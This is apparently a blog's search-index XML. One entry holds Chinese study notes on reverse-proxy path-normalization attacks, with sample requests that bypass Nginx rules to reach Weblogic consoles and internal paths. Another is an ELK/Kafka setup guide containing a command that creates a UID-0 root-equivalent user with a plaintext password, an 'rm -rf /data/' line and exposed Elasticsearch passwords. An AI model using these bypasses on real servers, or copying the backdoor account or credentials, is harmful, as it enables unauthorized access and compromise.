-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathsearch.xml
More file actions
1154 lines (1096 loc) · 310 KB
/
search.xml
File metadata and controls
1154 lines (1096 loc) · 310 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title><![CDATA[a-fresh-look-on-reverse-proxy-related-attacks总结]]></title>
<url>/2020/01/13/a-fresh-look-on-reverse-proxy-related-attacks%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>近期对<a href="https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/" target="_blank" rel="external">A Fresh Look On Reverse Proxy Related Attacks</a> 一文进行了深入学习,根据自己的实践结果撰写笔记。</p>
<h3 id="反向代理如何工作?"><a href="#反向代理如何工作?" class="headerlink" title="反向代理如何工作?"></a>反向代理如何工作?</h3><p>反向代理是从互联网接收请求并转发到内网服务器,对用户而言无感知存在。一个反向代理功能包含接收请求,处理,并转发到后端。</p>
<p><img src="https://i.imgur.com/hgtrNef.png" alt=""></p>
<h4 id="a-处理请求"><a href="#a-处理请求" class="headerlink" title="a) 处理请求"></a>a) 处理请求</h4><p>代理机请求处理包含以下几个主要步骤:</p>
<ol>
<li>语法</li>
<li>URL 解码</li>
<li>路径标准化</li>
</ol>
<a id="more"></a>
<p>许多服务器支持常规的路径标准,如:</p>
<p>/long/../path/here -> /path/here<br>/long/./path/here -> /long/path/here</p>
<p>但是如何处理<code>/..</code>?,在Apache中它相当于<code>/../</code>,但是在Nginx中无任何作用。</p>
<p>/long/path/here/.. -> /long/path/ - Apache<br>/long/path/here/.. -> /long/path/here/ - Nginx</p>
<blockquote>
<p>在Apache Tomcat上同Apache</p>
</blockquote>
<p><code>//</code>空路径,Nginx将其转换成/,但是如果不在首位Apache将其作为一个真实目录对待。</p>
<p>//long//path//here -> /long/path/here - Nginx<br>//long/path/here -> /long/path/here - Apache<br>/long//path/here -> /long//path/here - Apache</p>
<blockquote>
<p>但是有些web servers支持一些奇怪的特性,比如Tomcat和Jetty支持<code>/..;/</code>特殊路径,或者使用<code>\..\</code>进行遍历。</p>
</blockquote>
<p>/long/path/here/..;/ -> /long/path/ - Tomcat</p>
<h4 id="b-应用规则"><a href="#b-应用规则" class="headerlink" title="b) 应用规则"></a>b) 应用规则</h4><p>基于路径的规则转发</p>
<p><a href="http://nginx.org/en/docs/http/ngx_http_core_module.html#location" target="_blank" rel="external">http://nginx.org/en/docs/http/ngx_http_core_module.html#location</a></p>
<h4 id="c-转发到后端"><a href="#c-转发到后端" class="headerlink" title="c) 转发到后端"></a>c) 转发到后端</h4><p>取决于代理服务器是否修改请求。</p>
<h3 id="案例"><a href="#案例" class="headerlink" title="案例"></a>案例</h3><h4 id="Nginx"><a href="#Nginx" class="headerlink" title="Nginx"></a>Nginx</h4><p>是否斜杠结尾</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">location /api/ {</div><div class="line"> proxy_pass http://backend_server/;</div><div class="line"> #proxy_pass http://backend_server;</div><div class="line">}</div></pre></td></tr></table></figure>
<p>带斜杠<br><a href="http://domain/api/long/" target="_blank" rel="external">http://domain/api/long/</a> -> <a href="http://backend_server/long/" target="_blank" rel="external">http://backend_server/long/</a></p>
<p>不带斜杠<br><a href="http://domain/api/long/" target="_blank" rel="external">http://domain/api/long/</a> -> <a href="http://backend_server/api/long/" target="_blank" rel="external">http://backend_server/api/long/</a></p>
<p>参考:<br><a href="https://www.leavesongs.com/PENETRATION/nginx-insecure-configuration.html" target="_blank" rel="external">https://www.leavesongs.com/PENETRATION/nginx-insecure-configuration.html</a><br><a href="https://www.jianshu.com/p/c751250a5112" target="_blank" rel="external">https://www.jianshu.com/p/c751250a5112</a></p>
<h4 id="Haproxy"><a href="#Haproxy" class="headerlink" title="Haproxy"></a>Haproxy</h4><p>Haproxy通常用作负载均衡,它极少的处理请求,即不支持URL解码,协议标准化,更不支持绝对URL。</p>
<h3 id="服务端攻击"><a href="#服务端攻击" class="headerlink" title="服务端攻击"></a>服务端攻击</h3><h4 id="绕过限制"><a href="#绕过限制" class="headerlink" title="绕过限制"></a>绕过限制</h4><p>当攻击者想要访问某些受限功能时。</p>
<p>例1.</p>
<p>当Nginx作为反向代理,Weblogic作为后端服务器时。Nginx通过拒绝访问以<code>/console/</code>开头的路径限制管理界面。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">location /console/ {</div><div class="line"> deny all;</div><div class="line"> return 403;</div><div class="line">}</div><div class="line"></div><div class="line">location / {</div><div class="line"> proxy_pass http://weblogic;</div><div class="line">}</div></pre></td></tr></table></figure>
<p>这里proxy_pass之后没有斜杠,因此请求将不处理转发到后端。但是Nginx将丢弃<code>#</code>之后的所有内容,Weblogic将<code>#</code>作为常规符号。恶意攻击者便可通过发送以下请求访问管理接口。</p>
<p><code>GET /#/../console/ HTTP/1.1</code></p>
<p>实例:访问Weblogic控制台<br><code>GET /#/../console/login/LoginForm.jsp HTTP/1.1</code></p>
<h4 id="请求路由错误"><a href="#请求路由错误" class="headerlink" title="请求路由错误"></a>请求路由错误</h4><h5 id="例1"><a href="#例1" class="headerlink" title="例1"></a>例1</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">location /to_app {</div><div class="line"> proxy_pass http://weblogic;</div><div class="line">}</div></pre></td></tr></table></figure>
<p>以上配置,代理请求仅转发到Weblogic唯一后端(<a href="http://weblogic/to_app),所以只有当Nginx请求来自于/to_app时才转发到Weblogic上的相同路径。" target="_blank" rel="external">http://weblogic/to_app),所以只有当Nginx请求来自于/to_app时才转发到Weblogic上的相同路径。</a></p>
<p>为了访问其他目录,我们需要知道一下两点:</p>
<ol>
<li>proxy_pass配置后端没有斜杠</li>
<li>Weblogic支持路径参数(<a href="https://tools.ietf.org/html/rfc3986#section-3.3)" target="_blank" rel="external">https://tools.ietf.org/html/rfc3986#section-3.3)</a></li>
</ol>
<blockquote>
<p>区别于Tomcat的<code>/..;/..;/</code>路径遍历,Weblogic则将第一个<code>;</code>之后的所有内容作为路劲参数。</p>
</blockquote>
<p>恶意攻击者可以通过以下请求访问任意目录。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">GET /any_path_on_weblogic;/../to_app HTTP/1.1</div></pre></td></tr></table></figure>
<p>Nginx接收到此请求,匹配到<code>/to_app</code>规则,再将<code>/any_path_on_weblogic;/../to_app</code>转发至后端。由于特性,Weblogic认为只是在访问<code>/any_path_on_weblogic</code>路径,当然还可以在<code>;</code>之后增加/../进行深层次遍历。</p>
<p>实例:访问/wls-wsat/CoordinatorPortType<br><code>GET /wls-wsat/CoordinatorPortType;/../../to_app HTTP/1.1</code></p>
<p>实例:在Nginx只转发.do结尾的请求规则到后端时如何访问后端.jsp文件</p>
<p><code>GET /bea_wls_internal/.shell.jsp;/../../xx.do HTTP/1.1</code></p>
<h5 id="例2"><a href="#例2" class="headerlink" title="例2"></a>例2</h5><p>听说这是一个不会被修复的bug,翻译表示太难了。</p>
<p>当代理服务器规则为<code>location /to_app</code>时,路径<code>/to_app</code>,<code>/to_app/</code>,<code>/to_app_anything</code>(包括特殊符号)都可以匹配该规则。并且<code>/to_app</code>前缀后的字符将与proxy_pass值拼接。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">location /to_app {</div><div class="line"> proxy_pass http://server/any_path/;</div><div class="line">}</div></pre></td></tr></table></figure></p>
<p>在以上配置中,如果我们发起<code>/to_app_anything</code>访问请求,代理服务器将转发<code>http://server/any_path/_anything</code>到后端。<br>结合这些特性,恶意攻击者几乎可以通过以下方式遍历后端任意路径。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">GET /to_app../other_path HTTP/1.1 -> http://server/any_path/../other_path</div></pre></td></tr></table></figure></p>
<p>实例:访问Weblogic后端console<br><code>GET /to_app1../console/login/LoginForm.jsp HTTP/1.1</code></p>
<h5 id="例3"><a href="#例3" class="headerlink" title="例3"></a>例3</h5><p>在某些情况,反向代理服务器根据主机头将请求路由到不同的后端。以Haproxy为例,因为其不能处理绝对URI,便可以通过以下方式访问后端任意主机。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">GET http://unsafe-value/path/ HTTP/1.1</div><div class="line">Host: example1.com</div></pre></td></tr></table></figure></p>
<p>不过在大部分情况下(Nginx, Haproxy, Varnish)这是不能做到的,但是Apache在某些配置版本下则可以。由于此漏洞(CVE-2011-3368)太老,我们不再深入研究,这里提供以下两个链接参考。</p>
<p><a href="https://www.exploit-db.com/exploits/17969" target="_blank" rel="external">https://www.exploit-db.com/exploits/17969</a><br><a href="https://www.contextis.com/de/blog/server-technologies-reverse-proxy-bypass" target="_blank" rel="external">https://www.contextis.com/de/blog/server-technologies-reverse-proxy-bypass</a><br><a href="https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf" target="_blank" rel="external">https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf</a></p>
<h3 id="客户端攻击"><a href="#客户端攻击" class="headerlink" title="客户端攻击"></a>客户端攻击</h3><h4 id="Web缓存欺骗-Web-Cache-Deception"><a href="#Web缓存欺骗-Web-Cache-Deception" class="headerlink" title="Web缓存欺骗 Web Cache Deception"></a>Web缓存欺骗 Web Cache Deception</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"># Nginx缓存配置</div><div class="line">proxy_cache_path /temp levels=1:2 keys_zone=my_cache:10m inactive=120s;</div><div class="line">location ~ .*\.(gif|jpg|png|css|js)(.*) {</div><div class="line"> proxy_cache my_cache;</div><div class="line"> proxy_pass http://30.3.228.163:7041;</div><div class="line"> proxy_cache_valid 200 302 60m;</div><div class="line"> proxy_set_header X-Real-IP $remote_addr;</div><div class="line"> proxy_ignore_headers Cache-Control Expires Set-Cookie;</div><div class="line"> add_header Nginx-Cache "$upstream_cache_status";</div><div class="line">}</div></pre></td></tr></table></figure>
<p>以上配置使得Nginx将缓存指定扩展名文件内容,当我们访问诸如<code>/home.php/nonexistent.css</code>链接时响应内容与访问<code>/home.php</code>相同,Nginx将缓存当前页面信息,恶意攻击者通过访问<code>/home.php/nonexistent.css</code>获取用户敏感信息。</p>
<p>参考资料<br><a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack-wp.pdf" target="_blank" rel="external">https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack-wp.pdf</a><br><a href="http://omergil.blogspot.ru/2017/02/web-cache-deception-attack.html" target="_blank" rel="external">http://omergil.blogspot.ru/2017/02/web-cache-deception-attack.html</a></p>
<h4 id="Web缓存中毒-Practical-Web-Cache-Poisoning"><a href="#Web缓存中毒-Practical-Web-Cache-Poisoning" class="headerlink" title="Web缓存中毒 Practical Web Cache Poisoning"></a>Web缓存中毒 Practical Web Cache Poisoning</h4><p>通过添加X-Forwarded-Host (XFH)头观察是否在返回包中回显。</p>
<blockquote>
<p>反向代理(如负载均衡服务器、CDN等)的域名或端口号可能与处理请求的源服务器有所不同,X-Forwarded-Host 用来确定哪一个域名是最初被用来访问的。</p>
</blockquote>
<p><a href="https://i.blackhat.com/us-18/Thu-August-9/us-18-Kettle-Practical-Web-Cache-Poisoning-Redefining-Unexploitable.pdf" target="_blank" rel="external">https://i.blackhat.com/us-18/Thu-August-9/us-18-Kettle-Practical-Web-Cache-Poisoning-Redefining-Unexploitable.pdf</a></p>
<h5 id="HTTP响应拆分(CRLF注入)"><a href="#HTTP响应拆分(CRLF注入)" class="headerlink" title="HTTP响应拆分(CRLF注入)"></a>HTTP响应拆分(CRLF注入)</h5><p>-|-|-<br>CR|回车|\r|%0d<br>LF|换行|\n|%oa</p>
<p>客户端浏览器通过\r\n来区分http协议的header和body,一旦我们能够控制响应头中的字符,就能修改浏览器解析结果,从而实现恶意行为。</p>
<h5 id="请求走私-HTTP-Request-Smuggler"><a href="#请求走私-HTTP-Request-Smuggler" class="headerlink" title="请求走私 HTTP Request Smuggler"></a>请求走私 HTTP Request Smuggler</h5><p><a href="https://paper.seebug.org/1048/?from=timeline&isappinstalled=0" target="_blank" rel="external">https://paper.seebug.org/1048/?from=timeline&isappinstalled=0</a></p>
]]></content>
</entry>
<entry>
<title><![CDATA[ELK]]></title>
<url>/2019/03/19/ELK/</url>
<content type="html"><![CDATA[<h2 id="指南"><a href="#指南" class="headerlink" title="指南"></a>指南</h2><p><a href="https://elkguide.elasticsearch.cn/logstash/get-start/install.html" target="_blank" rel="external">https://elkguide.elasticsearch.cn/logstash/get-start/install.html</a></p>
<h2 id="架构"><a href="#架构" class="headerlink" title="架构"></a>架构</h2><p>Elasticsearch 实时全文搜索和分析引擎<br>Logstash 日志收集,分析,过滤<br>Kibana 数据图形化展示</p>
<p><img src="http://static.open-open.com/news/uploadImg/20150716/20150716205233_183.png" alt=""></p>
<p>Server(producer) Beats -> Zookeeper Kafka topic -> (按照业务功能拆分ELK cluster) Logstash (consumer) -> ES -> Kibana (日志敏感信息泄露)</p>
<p>服务器<br>/etc/hosts<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">30.3.229.120 develk01</div><div class="line">30.3.229.121 develk02</div><div class="line">30.3.229.122 develk03</div><div class="line">30.3.229.123 devkafka01</div><div class="line">30.3.229.124 devkafka02</div><div class="line">30.3.229.125 devkafka03</div></pre></td></tr></table></figure></p>
<p>添加root用户<br>useradd -u 0 -o -g root -G root -d /root/ user1<br>echo “user1”:”passw0rD” | chpasswd</p>
<a id="more"></a>
<h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h2><p>升级java至1.8</p>
<p>卸载低版本java<br>rpm -qa | grep jdk<br>yum -y remove jdk-1.7.0_79-fcs.x86_64<br>yum -y list java*<br>yum -y install java-1.8.0-openjdk.x86_64<br>rpm -i jdk-8u171-linux-x64.rpm<br>rpm -qa | grep logstash<br>rpm -e –nodeps logstash-5.6.10-1.noarch</p>
<p>版本选择</p>
<p>Beats<br>Elasticsearch<br>Elasticsearch Hadoop<br>Kibana<br>Logstash<br>X-Pack</p>
<h3 id="Elasticsearch"><a href="#Elasticsearch" class="headerlink" title="Elasticsearch"></a>Elasticsearch</h3><p>/etc/elasticsearch/elasticsearch.yml # els的配置文件<br>/etc/elasticsearch/jvm.options # JVM相关的配置,内存大小等等<br>/etc/elasticsearch/log4j2.properties # 日志系统定义<br>/var/lib/elasticsearch # 数据的默认存放位置</p>
<p>集群配置</p>
<p>/etc/elasticsearch/elasticsearch.yml </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">cluster.name: elk-cluster</div><div class="line">node.name: ${HOSTNAME}</div><div class="line">#node.master: true</div><div class="line">#node.data: true</div><div class="line">network.host: 0.0.0.0</div><div class="line">http.port: 9200</div><div class="line">path.data: /data/els/data</div><div class="line">path.logs: /data/els/logs</div><div class="line">bootstrap.memory_lock: false</div><div class="line">bootstrap.system_call_filter: false</div><div class="line">network.host: 0.0.0.0</div><div class="line">http.port: 9200</div><div class="line">discovery.zen.ping.unicast.hosts: ["devekl01", "develk02","develk03"]</div><div class="line">discovery.zen.minimum_master_nodes: 2</div></pre></td></tr></table></figure>
<p>/etc/security/limits.conf</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">* soft nofile 65536</div><div class="line">* hard nofile 65536</div></pre></td></tr></table></figure>
<p>启动报错</p>
<p>Java HotSpot(TM) 64-Bit Server VM warning: INFO: os::commit_memory(0x0000000085330000, 2060255232, 0) failed; error=’Cannot allocate memory’ (errno=12)</p>
<p>/etc/elasticsearch/jvm.options</p>
<p>-Xms512m<br>-Xmx512m</p>
<p>[2]: max number of threads [1832] for user [elasticsearch] is too low, increase to at least [2048]</p>
<p>ulimit -u 2048</p>
<p>创建数据目录<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">rm -rf /data/</div><div class="line">mkdir -p /data/els/{logs,data}</div><div class="line">chown -R elasticsearch.elasticsearch /data/*</div><div class="line">service elasticsearch start`</div><div class="line">or</div><div class="line">bin/elasticsearch -d</div></pre></td></tr></table></figure></p>
<p>查看节点</p>
<p><a href="http://30.3.229.120:9200/_cat/nodes?pretty" target="_blank" rel="external">http://30.3.229.120:9200/_cat/nodes?pretty</a></p>
<h4 id="常用操作"><a href="#常用操作" class="headerlink" title="常用操作"></a>常用操作</h4><p>查看索引<br><code>curl http://localhost:9200/_cat/indices?v</code></p>
<p>删除索引<br><code>curl -u elastic:changeme -XDELETE http://localhost:9200/my_index</code></p>
<p>/_cat/health?v<br>/_cat/nodes?v </p>
<p>安装x-pack<br><code>bin/elasticsearch-plugin install x-pack</code></p>
<p>修改x-pack默认密码<br><code>curl -XPUT -u elastic 'localhost:9200/_xpack/security/user/elastic/_password' -d '{"password" : "dfh*&(dUJ"}'</code></p>
<h4 id="elasticsearch-head-监控"><a href="#elasticsearch-head-监控" class="headerlink" title="elasticsearch-head 监控"></a>elasticsearch-head 监控</h4><p>yum install nodejs<br>yum install npm<br>npm install -g grunt-cli<br>git config –global https.proxy <a href="http://127.0.0.1:1080" target="_blank" rel="external">http://127.0.0.1:1080</a><br>git clone git://github.com/mobz/elasticsearch-head.git<br>npm config set strict-ssl false<br>npm config set registry <a href="https://registry.npm.taobao.org" target="_blank" rel="external">https://registry.npm.taobao.org</a><br>npm config set proxy <a href="http://127.0.0.1:1080" target="_blank" rel="external">http://127.0.0.1:1080</a><br>npm info express<br>npm install<br>grunt server</p>
<p>后台运行<br>nohup grunt server &</p>
<p><a href="http://localhost:9100" target="_blank" rel="external">http://localhost:9100</a></p>
<h3 id="Logstash"><a href="#Logstash" class="headerlink" title="Logstash"></a>Logstash</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">[logstash-5.x]</div><div class="line">name=Elastic repository for 5.x packages</div><div class="line">baseurl=https://artifacts.elastic.co/packages/5.x/yum</div><div class="line">gpgcheck=1</div><div class="line">gpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch</div><div class="line">enabled=1</div><div class="line">autorefresh=1</div><div class="line">type=rpm-md</div></pre></td></tr></table></figure>
<p>/etc/logstash/conf.d/elk.conf</p>
<p>input –> filter –> output</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div></pre></td><td class="code"><pre><div class="line">input {</div><div class="line"> syslog {</div><div class="line"> syslog_field => "syslog" # default message</div><div class="line"> port => 514</div><div class="line"> }</div><div class="line"> beats {</div><div class="line"> port => 5044</div><div class="line"> }</div><div class="line">}</div><div class="line">filter {</div><div class="line">}</div><div class="line">output {</div><div class="line"> elasticsearch {</div><div class="line"> hosts => ["192.168.200.109:9200"]</div><div class="line"> index => "test-%{+YYYY.MM}" </div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure>
<p>启动logstash<br><code>nohup bin/logstash --debug --path.settings /etc/logstash/ -f config/test.conf > ls.log 2>&1 &</code><br>多实例<br>bin/logstash -f config/syslog.conf –path.data=/tmp</p>
<p><a href="https://www.elastic.co/guide/en/logstash/5.6/config-examples.html" target="_blank" rel="external">https://www.elastic.co/guide/en/logstash/5.6/config-examples.html</a></p>
<p>写入kafka<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line">input {</div><div class="line"> stdin{}</div><div class="line">}</div><div class="line">output {</div><div class="line"> kafka {</div><div class="line"> topic_id => "test"</div><div class="line"> codec => plain {</div><div class="line"> format => "%{message}"</div><div class="line"> charset => "UTF-8"</div><div class="line"> }</div><div class="line"> bootstrap_servers => "192.168.6.22:9092"</div><div class="line"> }</div><div class="line"> stdout{</div><div class="line"> codec => rubydebug</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure></p>
<p>读取kafka<br>区别于低版本,5.0后的版本连接kafka实例地址,而非zk。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line">input{</div><div class="line"> kafka{</div><div class="line"> bootstrap_servers => ["192.168.6.22:9092"]</div><div class="line"> #client_id => "test"</div><div class="line"> group_id => "test"</div><div class="line"> auto_offset_reset => "latest"</div><div class="line"> consumer_threads => 5</div><div class="line"> decorate_events => true</div><div class="line"> topics => ["test"]</div><div class="line"> }</div><div class="line">}</div><div class="line">output{</div><div class="line"> elasticsearch { </div><div class="line"> hosts => ["127.0.0.1:9200"] </div><div class="line"> index => "test-%{+YYYY.MM}"</div><div class="line"> user => 'elastic'</div><div class="line"> password => 'changeme'</div><div class="line"> </div><div class="line"> }</div><div class="line"> stdout{</div><div class="line"> codec => rubydebug</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure></p>
<p>多进程</p>
<p>bin/logstash -f config/rsyslog.conf –path.data=/tmp</p>
<p>安装x-pack监控<br>logstash-plugin install file:///tmp/x-pack-5.6.10.zip</p>
<p>nano config/logstash.yml </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">xpack.monitoring.elasticsearch.url: ["http://10.2.0.27:9200"] </div><div class="line">xpack.monitoring.elasticsearch.username: "elastic" </div><div class="line">xpack.monitoring.elasticsearch.password: "dfh*&(dUJ"</div><div class="line">xpack.monitoring.enabled: true</div><div class="line">xpack.monitoring.collection.interval: 10s</div></pre></td></tr></table></figure>
<h3 id="Kafka"><a href="#Kafka" class="headerlink" title="Kafka"></a>Kafka</h3><p>Topic<br>Kafka将消息种子(Feed)分门别类 每一类的消息称之为话题(Topic).<br>Producer<br>发布消息的对象称之为话题生产者(Kafka topic producer)<br>Consumer<br>订阅消息并处理发布的消息的种子的对象称之为话题消费者(consumers)<br>Broker<br>已发布的消息保存在一组服务器中称之为Kafka集群。集群中的每一个服务器都是一个代理(Broker). 消费者可以订阅一个或多个话题并从Broker拉数据从而消费这些已发布的消息。</p>
<p>由于broker采用了主题topic–>分区的思想,使得某个分区内部的顺序可以保证有序性,但是分区间的数据不保证有序性。这样,消费者可以以分区为单位,自定义读取的位置——offset。</p>
<p>兼容性<br>如果使用logstash 5.x 则相应的kafka版本选择0.10.0.x<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"># |==========================================================</div><div class="line"># |Kafka Client Version |Logstash Version |Plugin Version |Why?</div><div class="line"># |0.8 |2.0.0 - 2.x.x |<3.0.0 |Legacy, 0.8 is still popular </div><div class="line"># |0.9 |2.0.0 - 2.3.x | 3.x.x |Works with the old Ruby Event API (`event['product']['price'] = 10`) </div><div class="line"># |0.9 |2.4.x - 5.x.x | 4.x.x |Works with the new getter/setter APIs (`event.set('[product][price]', 10)`)</div><div class="line"># |0.10.0.x |2.4.x - 5.x.x | 5.x.x |Not compatible with the <= 0.9 broker</div><div class="line"># |==========================================================</div></pre></td></tr></table></figure></p>
